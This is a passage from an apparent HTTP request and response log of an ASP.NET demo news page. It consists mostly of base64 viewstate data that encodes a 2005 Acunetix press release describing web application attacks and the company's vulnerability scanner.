dHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGx